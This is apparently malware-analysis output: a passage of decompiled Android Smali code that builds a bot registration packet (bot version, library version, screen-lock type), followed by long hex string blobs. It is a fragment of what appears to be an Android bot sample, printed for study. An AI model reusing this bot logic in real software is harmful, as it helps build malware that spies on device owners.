                        65const-string v2, "botVer"
                        67sget-object v3, Lcom/lib;->botVersion:Ljava/lang/String;
                        69invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        71const-string v2, "libVer"
                        73const-string v3, "0.0.0.1"
                        75invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        77const-string v2, "screenLockType"
                        78new-instance v3, Lcom/lib$screenLockType;
                        80invoke-direct {v3, p0}, Lcom/lib$screenLockType;-><init>(Lcom/lib;)V
                        82invoke-virtual {p1}, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
                        83move-result-object v4
                        85invoke-virtual {v3, v4}, Lcom/lib$screenLockType;->getCurrent(Landroid/content/ContentResolver;)I
                        86move-result v3
                        88invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
                        90const-string v2, "reason"
                        92const-string v3, "reg"
                        94invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        96const-string v2, "data"
                        98invoke-virtual {v0, v2, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        99goto_7c: return-object v0
                        100catch_7d: move-exception v0
                        101new-instance v1, Ljava/lang/StringBuilder;
                        103invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        105const-string v2, "[func] [makeRegPacket] T: "
                        107invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        108move-result-object v1
                        110invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        111move-result-object v0
                        113invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        114move-result-object v0
                        116invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        117const/4 v0, 0x0
                        118goto/16 :goto_7c
                        Cross References
                        APIs
                        • java.lang.String.<init>
                        Strings
                        • 0563dd99761227c7ed4e59cacac8d3ff6728c1b1eb4af7fa250f9965b6fbe8c245c1a862785cfefc7a790859db33763fd64100209e63a671cf0cee7dd15faabff9ce4454f388294ce34052f0a5137bb38a7aabc3800ed5bb9038dac14d97d0b837c7c4219194fa0ab09db0ff4ae36d55f2c05a50d6d84252a0cc86f737566420142d8a5305f32d177c06331531daea4350d4a816719755f58c9222221eab991df39338b437ef56e014b99de7ba801454d73e3eecf02d07b3fc4020acb622a4f0bb986b0dcb7304e6dfd50320e2e8045352ab564125a2606c21fc9d58d91e4353a9c762c238b430bab1bbaf30c104510002f68066a7e6edab9c84e54ad037519149fe9a9cfe8aca7845556bc4133dd30dff8bcffb52d77cbbede58bc514ec556b3747e24f2c163cf58193683cbce68d136bb1ba989879d14ea9f422a0ac2686a1a548986a81805456d8efc7aad586822102c472b04ee9e0474a0b283142081323fbdb9eed418f94ed4ee5a344d36a00d15e5d3443bb85ebb1b4611850ed721c82e1385c60a0e206a5c8fa3b0357d6867ea872722842e2cef84b016172fef1812a844855692a06febd1e2618e5dedc902eb2d6af06cbd2cd8982c263e4c4a062f10520578a7c63c26043a5aa8de13b9bf42d600db7d753ade165decfaa1e9cf640a478de30b220216155cf063815fd7d242eb2b081c37c9c752f47db7efbfdb3298ad54d374049b7e6b31dce880e716b10fff2bc0a4bf3f58b75ffcf0e166399051f683e4bc9ba4f84cf85da136a10469878b3efc81760bbea50da90bcd1029e1e5229c2d088d04bebf3775fa66af3f3614ef6ed66d2843be186eb03496713b89dee1844731b53ecc320a4e0d0b1a55f176f61a53541aaf8652876563708dcd374d529e7f8b96bbed4aa9d9dcf34e11d82d87135d47d2de84d3f752b0457fec5c230f61aeb37cba0c827de52c3cb94c98b959c073e10d2201c36f73db6711012975c5b4df85d3fcc69563838c797d7ddd1a18213e04bfcc76e9f206fda239e3629ba150c6aa073d759de2d7ebd82744f8691caec8e722ce7331fdeafec657896752350493c1dd838bf1884bc97942b206d0370f275cfc8bf0068c677a49786491d26f99f1e50a35ca0bfc5477cdddcb589acd848eaa024fc938e4a294a6b1e4909a80b2cf0f0f9fc9a649f3ce78947ff5f30fbc2e3fed1f2816e17c5a4cfe878ed5edcb325db0cac7681204e5a5016deb2934ec913ba113d1e54402bd08924f58a1dafce0be9591f45d9c405b9e743d8ac2e654f36d2bc56f9960892ed77e8c0e7c62351017cc83b9d90a37a1a830220051bacf614413486375350d6af4dc9e8b5074472ee5898a2759ac1ac04bf49254bde930bdd4974fb89d0d1466c8780baec2bcf8468e6e74d32375b1fff7700aa1eac8fe15067393f5cbb6216414fa6280423dc90438f5376f1710d1f405d517169b5dd766c24b75728b192f0948cbda90562acb395950c8ca5ee4727f40b283c720dcfba8f9f93f9ed39eff7152de85a86e09ade722b369c6e7bf31450391ca79c132ab465bff474065366e7de28a85b732173acba08dbf9989313bb29060fe5490516c1284be6129c02b5b5fb57c8de929ef32788c4c0558c9cd978128c59ac50b395930b9e42ce6b6236419897389ec335fb43d929588717a21d4ee67067b0912e55316a241b5a8e4f9399a210bed3c206536b5d258de2a796079774d9ebc2da95ec782ef5437805e01c168152711c4a70080be230ed06675de741beb19483dda4823465e136f4a747c27b2deb786e1b3c95c74344117b1c78f633e3f9066a5ddcc2289bec8800d8759c344cab223426e61a7ac66b23bc981ed4ba3ca14de232d0bd2ee7550de67d66702951f949eefebff2b44dd5519af9493c529db4a23d65e215569b037ac5b8e0513ad742247faeb38da6a03d6137ec99c3e04fe8656489e2b173af761f647e2db73cad0e6ee8701960985587dab1c4aa2a9977323d0f53b4ee00cf95e57d6f2b37e030ec4acd519e7e5505dc19099a3eaffe4939ffd051f7a3622c11d58e60a4aca47d6cb6045943eac1e1979d1bbf8791d8a5de2eea02e2b22ac71eb9c60ffbbe09d0be54b3a61c600f5d6320045f4429459d7afcaab5fde0fa959124bb09164d6a41b0ffe618e532ea4d19e7ea5dfb87fa0cea9decb6c9fac76d26aedb563f74e024ee0000860f8ca78ea13c49b7715f3b16d3e577e20202bf5e729311f05fc8fea9de735e2449a581b2005e4911ca574e79b37fc4631357c5cdcc9617d15f9279353a768f4f9fb7ac143f624bccf69515ced4e96c923c88a174d280855891d75d7411aa73a9de2ab1e268f927863927fe8e5aa7b47a3eb45602fc8299472caaa70234651e1cefd65626eea9a87d63ad8d6e38fcef15ec5b2b36d1feffe819e021474d694efb2c9724173c3572dbb6271ca7393a6d5ee1e7a97090ffbe199f2843b9c07290f3cbc6097f29cb22970932c95dc1133bcad8bba9e0bd37df3897a8d7f5398568763d1325b600de019667e33b327adc160736c2247112a730b8972732d58405bf67f305131a5a1891adf5f53a2667ad313883751d32d39c044a134dbfc1b2c36b74c5a244fbeea186e896e16d7129d26e9c6feec9cad4d6bee4ef02892d7539e91f84023b4a47f90cdf85822543a35a57f60df22d5bc3c6940caedd0cd62b82a95567bfb47d692e7794c1edae619c75d94396895f9df69e4f70d058e1180c0b33f4f51d5704ee9eb4c55a62f6603cfcae4275a4cf38c4aa045aa2dc0fd0669d025d92d170c672a6aaccacb9ed91db839bf65bd254ef4641057f40fc4960a010e47de137ba2167912d34465434159cecc1637681edb44650fd0f631485202944a30cd845c05dd3b743cff1264bb32131eacb308847c7feba002db039c0d08ed0eaa2f6bd5bf7b2a9492dbb612266c39022d6b3b8fff06afc9aa870ce47ca1932c9468ab9b5ac4fa09166c79c35409a1f0da8fbdfaa6981ef94352b7faab85112f20fc4cae4218e3e43be4a5017a6606666f4a277e1d80ab048b423413885f00c0ac80bc80228d64c57b48cb0868c84ca58a0e8a223f15d73784d313a9861e5006659f84817eddf46e585efb97f819b93375fc4d11b955308e871b3a89f98195b5a0d602d1c120d5508f0bf73369cff0dca8f5f5d0cc55c23f12810b122187a848f7e2ad40acbb84794c62aac63f891cdbf3d1f10acf8f94764cc636a11fb09daead5982e222be98c9ce25e43e3922e6f181dc57c4bf6c19ff7f269fdc94ca7d3690fe47be3458ec8ff55fddd1060af36a9bae67d2cb5a8013052d93a88863c723d277472a178194b1ad8cb595a67fcd7dda05e678fb111fe206dc7ef4294976f4eac372b6039ee7e285d493f6dddae75602465f9615ba2b4a90a293c8988bed68565e611cea05e1da945abe499a948276c72c32f9b705ab0a4d5009861ef4f8233f6836149f979e1d03ecbb3970f1769834ab4054539dbac6f744a44a1be834cbd158a2379857a421be5a22d042561b39595cb15c032eba5ac641462c22e8b6b22bb7017e58f466d624b3c57b68aab295098f0386f1f86d1676cedefcb60ef6839feed6f326869197cac1307cf0ece6d2ecb1d5212f0b2c5dc5128b87a2956a981252c150b7a3e499411cf5e7eeafaaf846c5b11dee7154047603414c694cb02804aad3622c5d359fb937d6436947711a582f59037e361587503f88c7acf9362ba8c67435accac08a7e5ac84daa6190fdf1ea53913e3cccdc6da723e077a7ebee01083825aca956f852b279219ae42db307a868ae1e4e3106c62a103e12adb6997618db7fb6d9d7a638d5fba54eb0a64c1c494c3b668d044e384f872b7b2a2c36eab0c9054f8154a5f9174e2d7825ff571447cfa2a3f661c856d45cd430e062f0a2cf7d25e6a1d7dca7b5be1352f40926f8a59063f552ffdb13e48a2cc5965723d1638d158e8ee2fc4488fe82d105fd0fd7409473083955567e5c066ffeaccd9047be159adacde9d2ccfc1e7bdb958408a06dacab8bc768a3d682db04b2d3387439ef81eca39412cf062026117b79f18040c15cbda55a276acfc4534
                        • 09daf30220bb32e33d54aab37c97704c1fd12045c6081fc38cfe25e35d8dc831
                        • 0bfaeb359e4a5a8aeecf2c55d8561221760068b3a8955daa15ff27c3ab03dc72
                        • 19e3f8c7dba690f8e523a373f74770221ba2d4a60e3a0b736958df130851d99bd38f31f171a11e5fa2380565259176390437f4f04f4deeb3af3d6a970274c4eae88fb89d0fa9a05108659e7b17e0d4aa1b7d422b84336027a43c64dafe73d503dd99a625f8e85cc677d8496fb51b7be59eed9270e134e22aa082d753e786d40cb55cc73c8505b7f6c3198b126d5b11567f12c35b3326b9c39321a322b354bec045d44d356d1020e2c24ca58ef8cda0a2dae5f9ea08008dcaafb1111ef7b44f62636d10acbd0e87a46ca990298e3d3a831dd6a6d3a75d8a34fb0de641e786dc776fd65f32c78e6cc5bbbdf8fb30fdf705b5f5195ef9691b804af4b1f5fe62cbe1c3b1403f6c0c127cdc3e05ee0221ca49655004286e575edce0cbd2b9b29b93bf892a7a76b2be252322b6c4042020811392740aca52143f55a3cf6bd789fa060868bfe3e15abad81483a575b5e17111f4617121bdf88799998922f78910aa7e8bed87f55c60d0f604a2f75b98c3b821ec8ea9660c6e3a39e16c69ad929f1f631178d48b7d442f0c4fa95abecb2b013ce21b04323be44d7b5d4e6aaa170a7ccedd0f935e80f83cb8588f2af8f85fee8e831ccefa822ba0d3d6fa4f845143117a88b5988ebd17ea370fb33edb67874608d49c1ee4687045974973770e3d82fa0a8ce2d31f929f0bffbbafdc3cdffd8c3c3a99e85f60aa837f770bc052acd2c28205b03e998df3c8b84d8c6a8d90bb9418a93c04ce592d4a279c27e58e13fe10c98b227712896781fc06976b2cc9652a21a871f336facd533cbb3a635db01ce3174e4e925cd0db77cd0cf9e9bf30ba3a9853765c4631e7c77ebb205396d72ccad7191d92c7f5436656c7ed26c9922d2cb51985514b3ddba672dca322374d7627622b54feee68c93c4e64ef5c369e55f65b52c1b9ba31a6caf91ba1bf6173bad0b043131dc03bc31813615bd65e260f595429edf64e4780874ba5b16bf9aa1533fa9cdc1800595b76e33384c0adf95c64a0edfa0e44a6124f987412b5c977f929c188c60321f32d1a763573f00485d9acf907b0e2326603513f4f9220dedc5e6d4721ec09827398794f2d38768cafa34ba4d2b620c72fd4bea6670497160b6eeae8d02f5a77f3f93d7f58c3e1cc9109e9bb0017c8516dce3519174a54ab3d8291456b5f15a42bf88a5e082a980d40223eff3e2e4e0507a9ee12b80d33193ea1be1b0d50844b698aba860f03e5977414780fe0c2f5e387702a712589e26a411d87d0976d9b9dce1f5d5eb7a2729600d162e070a33230c766772750db886ac5d845e36f16a847cf742edbf99b5b3ee54e85c9172c90b1fc30593d20e0cc9567d83b1010789c14c3fcf50790fea22be0b4836f76c6ba328d356e296c8f5a260e13445c8aecbad594a343585099f93fc69954023293b912ce7f661310ac14298299c2a26bbba8324bc9b9d5c822cf316d3b3573facd3c2245b7d9d0ce7a01c47e191c8c9b16e79c6b4603a3e3c23ea06b0ee78d2503521cf66e431ac3c419882d67066a32492213e90f702381bf181832ede0090217d94cbfa60ca522e7b2451eb2fb72fa77c23770f67b3af7ca576846f49ec56b16f1abeda9703eea44f85cce9ae75bb1705a415219f27d210bacadee4263d2e60289ee61cf52d7461079bebb717c8763da7d9635c8b051f773cf1e67a2427c8e55fe752ff974c1657e5b37b02304230a1208c2005afccfd2edf0e33d07758ad4ff32ca149ff7bf640948126018ba73e6a5dd5029d7ccbb09fa85eb6289fc9161dac585ac20e4942cd7e1925977c4f0014fda19e1120964f80a7352d1d86a8327ca1ce371074dfb8ddc73348c1a97dfd533ada5de9f8902afe3adfa7e47ebde13ed5c6ee0961b1f30d091079fad07b3ca8e162547742acc354a037e3f342f8f50883df2f00d1920698c636a096e022319844a00ee9a34ecc7abcd7282318b5f6cd54e1078b336f6c7183c7cab2ba881819907e0d160e70b68ffb761c4670bd1a28708744145e65f095e05fe0cfaf7664ee08b7449fa311d31d57ff2797e48f7542bd407a8513db0158c8287f2e2c15b64779296190cfb5da4a0658ea98df46415ca76896b19b2e9b0ef2c0cf64c45ed2fbfd98e20e07030370fd1e39c9e0671f24d9c9e05dcbc349d851ee22c960a40ae2153f5579372c47e230dbe9bb18960fe10fe976fa63dd37e482015eafab96d1d39145d721573b3c2ea5c18e255bd3e1ecf0026aa5a722c9f92ebc486d7b3abd620ba72fe1fb8f0705f9afd69280621b9437145504558ae1c46c824a7bc14a715d2de6d9dd69ef490d60a245173468409ca3794fd33c8de0a009e461023c0b0b68c9a80d537d7e5268a6b49532a5badc486889278e3c8d46b00cb8411b901fa0d13ca50f61a19265239a22fa74c715147ddc4d610346cd21de38d0c58bb000ba4a8a78dbc75885d79643078a6d23635c09422cb730574a3655c66ba6508718b8ca37b5ef6c20bba7610f34bf697bf73f31a29f747444793630ab738213e069f9ebc16f7bf6aaa06cd8122a7b92f5a1bcdcb2f29c598624ef3fc5c46745bc5587881eec5bac8c0e6dad21872c05a6b0f6f848ab90ad973eb54842babfd11aa09abc25d6af1fda3881f93d5d0aefc205cd6ad61389027d6c4b5c58b28d88f48a67955eeef7f36237a375ff6c1055bf4c7bffadf744bce91ea3f848cef81e88c8afae93a17991c4a6212ff0b5910148b6e1615af1ddaa4400a1449bdc6984230af3433a8ef1358f831342d14400b30b8046c3da4caff9390317e721d1fde6ea1a795211719b228f859e49551a05ed481454e8beb0552a671883883149d8471d7fcdd3b9ecb8a32c36e6121a6618b0e811dbe8a7ba119b3cc4ef3c798c30ce3ced54d9956ea26fe46eeb393ae3ca49197ca4493c1d186cf4f165ade5befd4fbea802a26bc81a811b0148fc2fed2a87b089c85298be76853488e0d3c9cc66b8ebc0fa5222ffad6499c6b69927850f2419fc827daf9e455ac5d5fe2c21ed363f024f9a1d3f5420d7ee07c384b9416b6a832dd35173f141afca2496691df37af700633abb7238cc8427abf5092e4255e738dd4e6a074021e4ac96c08ba894ecc55bd354aac8403b56fca847f0bf78b8a6a220d679d1e0353990a813c52de9fb18f99a0c4e4fc9cb5eed99bfb406eb26cd041709698b1cf597743546bec9f3d75d829d53c218e34d9caa031c1f8b6cea203898e5beb35459c81d3624fc1ee3aa6484b06cd32d8e61a17ee26d1759b926a40fd4c2083d44bc436d4258dbab542606d31b8a0c577d914b68f3accdfd8412e2a2d7606b11b7ab578c21f96b8c02e34c99eed319eafe0cdd5a809ac450e6e5f6b3d0cb6ebab8623007ff72c1754a53e4ea7e1af2779bc1d8ca8476d6f5cd7a80af0fcccfb3a2cd26ee251c14ee3e2c326be78dde64e89c461d3ec8886cd8b35305aaeb2d4a0dff90581962cc49edc1107380bd76887011b8114089ef01b396afc906aabbfb194d97237997680a1721239461e5eb4abde54ae3735b661d01d6328d1bdc41fa79163937e5ff2b2f8f878a86d1b3bdf57a44cc3b10ae93b9297c314fa6898dd607684e2e67db20555de0648ddb32ff5ceada2dd3bda0e3269d25a66573ab1b627bf5a44377b26880b54cd14c154234288aa7f74b6cbeb1849081a18b7ea45d07dd17c0f263e06e4557c762e4252df3088f57027cfa18f2c2dd97dfaf7a5ae4aa6ac118c2091a154b2b5a11365b1d6d6928448579fee02b13d8e790de8131421a822e6a52fda39c1f399aac09ec77a6c5c3a5b25e410926353e97b3b788bbb693ee1c26c7f23e1b1780d54a91603bfe933a812122a2d1c362b5a0dcf12957b912676545910c991dd9e4e4e119a1d575f9219404ec603f2fe4ee2160aa4d8ad4c4b585bc23e7b84d2191a1d2eecb4f4e1e30c181a182ef3f6c272a671a09fe2cfdcc265bcd1e1be8cf0c89c6b107e89f24b946da929ac59d2b304673daa8f70ffe3184f82dc8703d1d208906296ca6cd20cc6c0e215e0aad887bfefdeae2eb9456a411ce808ded100f5b9ec9738f14234822a45a37bf8b72fb72db9216ff85819cd826852c60164edc1
                        • 1a750d4679fa2af1c5cdac366617f43d4a75f2d0f929b50f4f3a7789fafad25d
                        • 213b20c8d0e867fb85bb17a263aa22095fa688e69fc8083c87450123d7937a95
                        • 2ec9e07c8b34ac263141b6a7566cc97814db0e4df9b08d05d1ad55a7b3ff945b
                        • 3205745bf8cbbe2704e5eae238b6871bb8efbb5ffc40a6e1545a543c79c6f31e
                        • 3695b5bbdfcbae568205cef6a376a6b6c9d0fd274a6b5c364c3c307d59de554b
                        • 38f78e3f4b824216a41c1791cea41fbb424bbbd3999dd697f668ae1a75302c8c
                        • 39e2cde0b96afbc4a74a79f712e05dd35c4b0476ab50f4dc240e033e7b4cb0a4
                        • 3b6aa0970278af9ee01767ce6ac60f96109aa418a366adbf8c4537ff842c4661
                        • 40d80cf262f4382b9ddb9699113afce12e958ddb3a14cf11ebb82ed3b07f3e59
                        • 44f93bf02770b1b859dbd07336f7d02ae05f841814e4d2bc9247da4b470a6153
                        • 522b61ad0a67a2455ce2c58e6b9470aba46a1ca6066b5ec7633e2656a167974d
                        • 59072a8fdb5c77018e78cd74a7892869a17fa81137900ccd34289d6d632cd193c915e1eb001803fb32ed5d48624962b400d6b29e3bafda5be0e9293256876f85581e724e7c4567144d30a060cedd6904d3cb82d8850868c9b71a0a1affaf6e7e51a551cff753d48e0e787520fb1c1833680849a6af468a9cdfee71ab07bf1a646f79a26f4a066cd011cb8102886dbfae054edd7e6d8d770739ba5ed462a50860bb09d6eacf024c0a9095002e7955cc71ca383a138dd2a4a4727a44d4d5fbc12d126cb1b78a5de0764b14300291df58aca5502957728f03aea8c1b116c0f9dfd3da916fef00ba79c777ee86c26fef97f27dcf6e74c074c52354990b2180847a2ded6c1fb454c481d0ddcdb81205dc5601eb48a0693ceee809dacb4d078fd1bc33ada6ae98f7a5d337a6e134a1eaa7a9dc9212a99460ff0b14d02bfa819a0879b4c5fcd4e18b3b655b7c66a2585defd4fd2f498381f22a52164de76f38292e2acb7b6cac06e2f946c4dbd2307fd1591bcd76b1f643ad0064ceab03d6e2929eee0b421828cc2749454ca5d1827e401a2dfd75d6fa3cbacc429711015a6dee4491997161b42dd252317cefb6c18a4e4d5f86efd4770acdbe75b9a6faf793363d469a5aaa53ff70865f828f1aee234c40d7cfa9517222e4617b3e03b14e175fedc962ceda2ba5861ea8d01c25962ee63f5f51bfb99d408073ae8add1efc40172b0740559988aa1af3cf462e9b69a5c4e47b6f3b3381c295e5e72126872b243416bcf211d184a0501768ee1e682998139bc70ee58f7be0aabd89ad911a4a696e3fbd740feb695cd014c84e9dee06405e9160433993c626187e39b832a98ecbdbeda30c6be035f185b7becbb316db80973dfabe110983f63f3aca5ab7b3e33995f5b9fa89997786489ad71623ed0d6d6e14c6096f1a67f1809d7ff1de421c55b0453b69336802a22effe5c75cdd27d297e8aa2045860357ad800184a4e5518bc2bc2b6520973696ddf0cb2652cc67c9f74eb07ba1fbe7597e578a9005097c80fcf93307bfc9d0828e861137cd5e11b440c86e99f0b61116f59ddf70854679f470dd5d715f633e4f7a6d1ec2144e3ee1b75afd454c5f1e996e97cdf598fba36f7ad182deaa8c308053ab16c6663c7320638c001d5fb26cd053b4cf3a05c527ffc20fbe71fd65852120bdba5dabca7c2ce890e3fc22ac15d48d4dfd559ddaa19302d44a3562d7a033259ab89840a5e33e98aa2d215885ec17679ae24e34338d5abea819432d514f47b8897a8b6c1a5b04c8e9016422b3fee41d385edd4da5b56b1f1167511180df13123e668378be8892fd943240853a14867736fcc3ae43071965e00eab049632861ec22f5049c9fd75cf71748662f4429fc1af624ef5fcbc45ebb63794a972adde683ad956b6a4f22e62faf79cc115f1dc61a6fb3af3313e93bfcabb08b490933abfcd6fcbc42ac26d64a6d8f8636f800979bb6f22d55642c762b8c61b173645ada84af900aef1ee16312d3d722eca8d614bddad3ebbad14b583d7e90bbdb4012caad0e57fce220047a5b698c06a3eafecdc9e75bc87d5db6fcfb50532b882480ffc8ebf8050709f765fd59488473a818686e0c4d9e2b0e6327983c218ef067b6e1ac4ab7e43365de73f09bcc650579587d03e53d42f3d7cf274c67694742bec212f5ec84322e92c7f5d9cf1883ecefdd75b35124a333431959bec991615d2204b3e23d59f7d798726bf32dbef0fa47f88438ff18b861eb89f238d9815e9c6df0f5b6888d7f119d44062c433512c56321cb549053374e6f9eb50cb477a6f696b39f14c79f6d00693ba2cb27d92f4aac29095f9d6b47ef7c2479fb14bddeda6c8a76a3942cb38be3e4d08468d1901bfa0c897d8de9402085c0037137969b101611539af4afb6a3f7aa15f3698c3e2529d890724e57ad73d71cb4155b665dab286ccccf9d36612a4de4c6e59027146091cfe90d160d43c96d370dc949b4bf667766d6db0204a9e3047dff858d97dabfcedace8deb771eae6ad4bc28115300237ec78d68cbfa01af69f88b9c5269ca514b8b24fa049c781248275b8ffd0add1eb84f49a480f4d6ef2570fdab0a328f09f26081fbef691c05578d6426affc67f3bc16975989c35dc6dac0da87128cdd5eeda470f25ff5fd9e59dc75d2b2191a4fffebd0b96836590aad99ff8bb14eee45e6b83555a0037ffaa104e92b9e2e8bc851d25c376e71c2fee8f0635eaa5a59928c76db2ab39d644e764408aaeaeea6c1c362b538d6decc5228d9c064e5e05a2e165ac9f25598e641d5a10902c8e461bfca4ef4dfa973d5b9a9f5b50f57ad3935e05c846ea36b39e8fa7de8e6a4a73fc43e80ae9fb44d59aa6883f04509ad1a30a7a31bdba65e9558ec01226886cc4e0228f4f64e25241eb2b80bf88470539d030f1192bacf3f001cb59570b1ac80cb891c6ed4d1c8c151285c05052a5e35e6c40407fc3658077713ef4c667dacd3d61a81240256dd4d91f7f2d66fc7c0b817c232e18c0d62df63b3df7395ddd307b585cc6415699a1d67317ed54f4461ae93ed7c8341902fc7f7951dfea8b8e4130bf9dbfda038b22c5116bf34a7a1b9b8234ace9f32c1b8ebe330fea6b794ac5870fcf87712b50c45fd1ed348290031ac2d6a3a94162b1eba3506087b70b6514383280243ecbec35f659c3080bae66fe1d0a1b1d9ed99bbcb9940b0a487eeae4a440ca25d65e95190d20ab767ad2825d5899e7cb40198ccb5ab491145ac61864bbadacb4c4f830a4cac447627299173764998cebed013d78c3f961cb39e62d7b713e2be50b6fb6513656bfd6e7c2fbc23d49cad7969f01a9e79cc365e662359299be505e3f9204064b22dbe4c9a39f4f297c1cfaf3c6a98deec76582518f3d6ee9dd81ea46410f74460d528023dba2ac4c59ce6c0b8d9ba5fd48702064f997e1463169c13f3dea8129d8c6637f19102ebbb57977af2182b1ed2e2f3deaa635d055bc1fbd8a069d989470f3716bbff3a27d06f420af535174f6f8376606b1922005b4f27a6aa394ce9403a0d6da912ba2184575efd478ffbcc9cdba09860f3c1e70ba291bec0ea45f2d0ddd42a3dfd40948ebec7639b75db4cf1927c7f03f6f12c8de6919eac429f5b11e5a147e79c96766ff4057f6288d7f78d9c252e403f9d6ed22964fd4f60a625b991e1f42ddbded99ab9bc2a20bcc9589ec07580b049c34457cb8daf89d5dd7cd072628804f3a16c5f8ff233e2942b34f419ab2862a3033164c1ec07f2dc717522ea8d4ac4d401e1e432b2c73f9c203cf276427799d41fb39d8ded4e6b53ed3d2a4faf82f5da3e90ab3dab89de3e41edd3ba094b514d5bf2da27b601bc7c30e0e063f17f7858c221ce2c5a587102b3b4538b629eb0348829ea522fff1433797f3b7502f417242e6e0cd215e87c3e3eb1ba000a815f071e478f210f36a9ae31d86858314f69354e5b619a60ddc618857052ab8041309f294de3e7493f45ea2bbb92ea4683c4459f78933f8e317492c609dbc67f7212f08fb9e4db8e4eff4b19d0198d57839191fc10380ad5102ab3c552f3a4b59f5df455732ac85a44611f4df2fe73a5dd146be5e8a589ef195634aa57c8805de836c9d9bfdcf8d218b0c2372617bc201e2a7401d362962600c279830e646cbd0f93aa2898a841d0e5f981e6c4a04448826612e0948cfc23b1dc0d30823b69ea153d46d9686e8f565685078736dedd77207373ae17b211f5ea061300c1af2caf01800fdc1498935436be7c503d2acf08d686a114459342c8f76cadef4f57bfed04cdb37a2a15f699d9b5dc6687420771827bc260a5ea7f305ad6575062a39b1a1ac57129e38810356c284a8f3614ce034db7d2d0f2f1e35cdaab84ba1029a61be0fd80d5c31dbc2b4931bea0ccd747aee98ef75e98460ea1d35fca35406b88f7f7bcf6a69a6660fc19df3b9e1a6690b5090e9b4d33610fe03a891a3d15aaf8a8be3b23ed4644261af157894e2fade8695cde5c499344606c458350f18c931015260a995677e385934a320a6522ba95b549e8a58af7c99dfecea659911cc60d19b78fd260fa74dad0e5be431dc322c0710348701d7d70d476c2117c65ae69557
                        • 7e89013da4660c162aae1a624080eb48b330e7148f32b0105869977614affd63
                        • 80efb68f3bb950a31302b53c4075aa2a96d3af193855cb28098b4aa390144e4b
                        • 86e549439e1c3e7e88bc7e996fc9f25dde14e8e97d1fbf5a32d8afaf0c8803ce
                        • 884fb251ad76de671b05a734ea1db767ce8dc9fef9675086b16682551fd80d17
                        • 88f7f9f9d23727f68964ce88a4d74e50b21a5402950552450c664146f5e6a77a
                        • 8fa79d6a01ab4180c626f37737365d3e2749f403451ae74184194bf90a32563b
                        • 91d8aff7f46aafbf6fd0deb4f0ac7c6d32e7bf3408e4fd18aca0942c0e2acf6a1a2c59142f46878dabc2c2c6dcebac0f7ad071fd72150c9836847ff4a000e5f967be9288a6d77ac1ecaaaa24d0a3cd23eaeb40924a8095dbb0eb490015df084f0d4a8196b7c59ceba76762c8c516a8daa18e5ee78db7b763bceaaf994bede31056547471427f9a9a36b9e57f557998801a77787acf0efb2075222787063504daaf8b1bd31a29074987b982eab826853ce057162b3a7731c4d2ca8eb90275bfc3fa0e4258c59d58c65dc0d412afd39af5213f95f78717a3e38c3c1f25b9c867b7c8083bcc5c4e27bdfe29fa24233c95062d2b488e1215ce6ca8b13f31fd0c999bfb7d14a29a9b5ed4ac6da36bc56c8eefc112c54200fc58a232251437227a7c7402eb5fbe1c08fb00db2043f0d8b7798c49fee39a44d5c35e26552510c0209c1acda5b6bfb42604940999ad772d9e82b3212623241032f640c183a091d6443aca5ef5a469711238a893346cc07d736cd6d1a67bf2b62f96ab3dd4b890f7d4b360b1c3507108b920fcfd607c38630b69f66f33b9dcf352ed4a8914d83f83d1dabacf15456e6f365c7b98f5249ccb6616cf5bfdb552f74aaae157933d5118b26b268ec832c3a9eeceba6f836e8f340b3a3b2c89c6192a8b7368f1c853bfae6d126c197161335510186e3954f3f7022c0ddcb289d6929c4df0c13ceda5bac05748f0e773dfe0468ec2f43e737425b18f5d2a773302906d13ceb6791a103b0791a382d61cbb8b241eecbf2d8b207109358c9bbebbf098aaa141f8c7c9a5b0f25ae03880cfd42b72694e1be5397123c2dcdddeca3d6c963eff9ac23e066f32590f2ab25603a4c3d70447a71b7b00ee1a7380c20a831e0d89ce9e864f2692fa930fc74beb261966c54ad3b0f304c54c461f9d0a8f1328659dad6726de280534dfd9fca6d4e6b53b47c45147ff40f6c1aacc0169076d0b3441e91182e9697236d81eb1021602f6c4cacb112d9924dd2b2a36241e9981c0598db10551380e7fd621f836547f304c11ea066a5f881e1bba154af28970bb4ec5d87660ac5e6306a3debd7cb17d8a153ae09a7f1210b62a86d80e7c0733825993ee63ad434f5b86c670b3f17db8cdf891d58159e57951390bd81a773ca15839bce1fe81000b6a6b91edb626e5c60c8660bf0e9c8f11923eaae68d1463de735ec63ff8027cbf924a1626f3fd878e286e5a1e03e3c36f7970e7aae5bff943981c46c42d9083ec01bacedc92971f60c3c1184379e9da3739c46757ad2177a97b6dc0e4c57bf18dd08e30bff98efe863f3f8123c463be0aa3ae2bbfe9443d307fa0e66f3cd6e330c713c17c72cefe9d56ebc9cd352faf9b861043865100231ef3450905dfb251f902890258a5fa3730b6a0777a5b380fb9a83aa17f449a58054206eb85c3ace3249acbdada3657dfad941ca5eebe270584a9a08caf375c5ac5c9a124c35ddf327b67b0675954dd2762fee2858cae483496203da51d830cc025d64a9476c541015c9590ede6ed9cbd033f96b2baff062d88642a1a300ff59d8eb2f634734ca11312caa337bb34c357fabb69623c3c0e11ad81b03d97bac04d498f4e5342ae4f4f656752f5995b7417111fe998d79b1c13a2abda3c6350e6119f09cc3ae7a865e27a69f65d28789307384aff53a00c312a2fdff687d49cfdc6c30710aa9f2b3cb31b3871cf843e8f74bcf9cd38108a8f7ed4cd3486afe339d804ac7d61ca3b215c709f9e268041e9e9229e50fb10ceed6ec25cfcc1128f3ec9d06278bb2d04ca5da019a407349998fc20de96a1b44b496a49c4e53b22f4fb1850df7196be7c7